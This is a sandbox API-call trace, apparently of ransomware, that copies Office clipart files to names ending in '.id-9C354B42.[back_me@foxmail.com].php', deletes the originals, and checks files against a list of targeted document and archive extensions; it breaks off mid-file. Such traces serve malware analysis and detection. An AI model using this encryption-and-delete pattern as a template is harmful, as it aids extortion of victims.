GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0 [0259.266] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.266] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0259.266] GetLastError () returned 0x0 [0259.266] ReadFile (in: hFile=0x3e0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x7f68, lpOverlapped=0x0) returned 1 [0259.283] WriteFile (in: hFile=0x3e4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x7f70, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x7f70, lpOverlapped=0x0) returned 1 [0259.284] ReadFile (in: hFile=0x3e0, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.284] WriteFile (in: hFile=0x3e4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.284] SetEndOfFile (hFile=0x3e4) returned 1 [0259.287] CloseHandle (hObject=0x3e4) returned 1 [0259.287] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.287] SetEndOfFile (hFile=0x3e0) returned 1 [0259.290] CloseHandle (hObject=0x3e0) returned 1 [0259.290] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.297] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101867.bmp")) returned 1 [0259.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.327] lstrlenW (lpString=".doc") returned 4 [0259.327] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString=".docx") returned 5 [0259.327] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1 [0259.327] lstrlenW (lpString=".pdf") returned 4 [0259.327] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString=".xls") returned 4 [0259.327] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString=".xlsx") returned 5 [0259.327] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1 [0259.327] lstrlenW (lpString=".ppt") returned 4 [0259.327] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.327] lstrlenW (lpString=".zip") returned 4 [0259.327] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString=".rar") returned 4 [0259.327] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString=".bz2") returned 4 [0259.327] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0259.327] lstrlenW (lpString=".7z") returned 3 [0259.327] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.328] lstrlenW (lpString=".dbf") returned 4 [0259.328] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.328] lstrlenW (lpString=".1cd") returned 4 [0259.328] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.328] lstrlenW (lpString=".jpg") returned 4 [0259.328] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.328] lstrlenW (lpString=".doc") returned 4 [0259.328] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString=".docx") returned 5 [0259.328] lstrcmpiW (lpString1=".docx", lpString2="7.BMP") returned -1 [0259.328] lstrlenW (lpString=".pdf") returned 4 [0259.328] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString=".xls") returned 4 [0259.328] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString=".xlsx") returned 5 [0259.328] lstrcmpiW (lpString1=".xlsx", lpString2="7.BMP") returned -1 [0259.328] lstrlenW (lpString=".ppt") returned 4 [0259.328] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.328] lstrlenW (lpString=".zip") returned 4 [0259.328] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString=".rar") returned 4 [0259.328] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString=".bz2") returned 4 [0259.328] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1 [0259.328] lstrlenW (lpString=".7z") returned 3 [0259.328] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1 [0259.328] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.329] lstrlenW (lpString=".dbf") returned 4 [0259.329] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0259.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.329] lstrlenW (lpString=".1cd") returned 4 [0259.329] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1 [0259.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101867.BMP") returned 63 [0259.329] lstrlenW (lpString=".jpg") returned 4 [0259.329] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1 [0259.329] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.329] lstrlenW (lpString="J0103850.WMF") returned 12 [0259.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0259.329] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=23596) returned 1 [0259.329] CloseHandle (hObject=0x3d4) returned 1 [0259.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf")) returned 0x20 [0259.329] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0259.330] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.330] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8 [0259.330] GetLastError () returned 0x0 [0259.330] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x5c2c, lpOverlapped=0x0) returned 1 [0259.338] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x5c30, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x5c30, lpOverlapped=0x0) returned 1 [0259.339] ReadFile (in: hFile=0x3d4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.339] WriteFile (in: hFile=0x3d8, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.339] SetEndOfFile (hFile=0x3d8) returned 1 [0259.339] CloseHandle (hObject=0x3d8) returned 1 [0259.339] SetFilePointerEx (in: hFile=0x3d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.339] SetEndOfFile (hFile=0x3d4) returned 1 [0259.353] CloseHandle (hObject=0x3d4) returned 1 [0259.353] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.454] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103850.wmf")) returned 1 [0259.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.455] lstrlenW (lpString=".doc") returned 4 [0259.455] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString=".docx") returned 5 [0259.455] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0259.455] lstrlenW (lpString=".pdf") returned 4 [0259.455] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString=".xls") returned 4 [0259.455] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.455] lstrlenW (lpString=".xlsx") returned 5 [0259.455] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0259.455] lstrlenW (lpString=".ppt") returned 4 [0259.455] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.455] lstrlenW (lpString=".zip") returned 4 [0259.455] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.455] lstrlenW (lpString=".rar") returned 4 [0259.455] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString=".bz2") returned 4 [0259.455] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString=".7z") returned 3 [0259.455] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.455] lstrlenW (lpString=".dbf") returned 4 [0259.455] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.455] lstrlenW (lpString=".1cd") returned 4 [0259.455] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.455] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.455] lstrlenW (lpString=".jpg") returned 4 [0259.456] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.456] lstrlenW (lpString=".doc") returned 4 [0259.456] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString=".docx") returned 5 [0259.456] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0259.456] lstrlenW (lpString=".pdf") returned 4 [0259.456] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString=".xls") returned 4 [0259.456] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.456] lstrlenW (lpString=".xlsx") returned 5 [0259.456] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0259.456] lstrlenW (lpString=".ppt") returned 4 [0259.456] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.456] lstrlenW (lpString=".zip") returned 4 [0259.456] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.456] lstrlenW (lpString=".rar") returned 4 [0259.456] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString=".bz2") returned 4 [0259.456] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString=".7z") returned 3 [0259.456] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.456] lstrlenW (lpString=".dbf") returned 4 [0259.456] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.456] lstrlenW (lpString=".1cd") returned 4 [0259.456] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.456] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103850.WMF") returned 63 [0259.456] lstrlenW (lpString=".jpg") returned 4 [0259.456] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.457] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.457] lstrlenW (lpString="J0105244.WMF") returned 12 [0259.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0259.457] GetFileSizeEx (in: hFile=0x3e4, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=11228) returned 1 [0259.457] CloseHandle (hObject=0x3e4) returned 1 [0259.457] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf")) returned 0x20 [0259.457] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0259.457] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.457] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.457] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4 [0259.458] GetLastError () returned 0x0 [0259.458] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x2bdc, lpOverlapped=0x0) returned 1 [0259.463] WriteFile (in: hFile=0x3d4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0x2be0, lpOverlapped=0x0) returned 1 [0259.464] ReadFile (in: hFile=0x3e4, lpBuffer=0x4290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x36afed4, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesRead=0x36afed4*=0x0, lpOverlapped=0x0) returned 1 [0259.464] WriteFile (in: hFile=0x3d4, lpBuffer=0x4290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x36afc9c, lpOverlapped=0x0 | out: lpBuffer=0x4290020*, lpNumberOfBytesWritten=0x36afc9c*=0xec, lpOverlapped=0x0) returned 1 [0259.464] SetEndOfFile (hFile=0x3d4) returned 1 [0259.464] CloseHandle (hObject=0x3d4) returned 1 [0259.464] SetFilePointerEx (in: hFile=0x3e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.465] SetEndOfFile (hFile=0x3e4) returned 1 [0259.466] CloseHandle (hObject=0x3e4) returned 1 [0259.467] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0259.480] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105244.wmf")) returned 1 [0259.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.480] lstrlenW (lpString=".doc") returned 4 [0259.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString=".docx") returned 5 [0259.481] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0259.481] lstrlenW (lpString=".pdf") returned 4 [0259.481] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString=".xls") returned 4 [0259.481] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.481] lstrlenW (lpString=".xlsx") returned 5 [0259.481] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0259.481] lstrlenW (lpString=".ppt") returned 4 [0259.481] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.481] lstrlenW (lpString=".zip") returned 4 [0259.481] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.481] lstrlenW (lpString=".rar") returned 4 [0259.481] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString=".bz2") returned 4 [0259.481] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString=".7z") returned 3 [0259.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.481] lstrlenW (lpString=".dbf") returned 4 [0259.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.481] lstrlenW (lpString=".1cd") returned 4 [0259.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.481] lstrlenW (lpString=".jpg") returned 4 [0259.481] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.481] lstrlenW (lpString=".doc") returned 4 [0259.481] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString=".docx") returned 5 [0259.482] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0259.482] lstrlenW (lpString=".pdf") returned 4 [0259.482] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString=".xls") returned 4 [0259.482] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0259.482] lstrlenW (lpString=".xlsx") returned 5 [0259.482] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0259.482] lstrlenW (lpString=".ppt") returned 4 [0259.482] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.482] lstrlenW (lpString=".zip") returned 4 [0259.482] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0259.482] lstrlenW (lpString=".rar") returned 4 [0259.482] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString=".bz2") returned 4 [0259.482] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString=".7z") returned 3 [0259.482] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0259.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.482] lstrlenW (lpString=".dbf") returned 4 [0259.482] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.482] lstrlenW (lpString=".1cd") returned 4 [0259.482] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0259.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105244.WMF") returned 63 [0259.482] lstrlenW (lpString=".jpg") returned 4 [0259.482] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0259.482] lstrcmpiW (lpString1=".WMF", lpString2=".php") returned 1 [0259.483] lstrlenW (lpString="J0105246.WMF") returned 12 [0259.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0259.483] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x36aff1c | out: lpFileSize=0x36aff1c*=19328) returned 1 [0259.483] CloseHandle (hObject=0x384) returned 1 [0259.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf")) returned 0x20 [0259.483] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0259.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105246.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105246.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0259.483] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.483] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x36afec8 | out: lpNewFilePointer=0x0) returned 1 [0259.483] 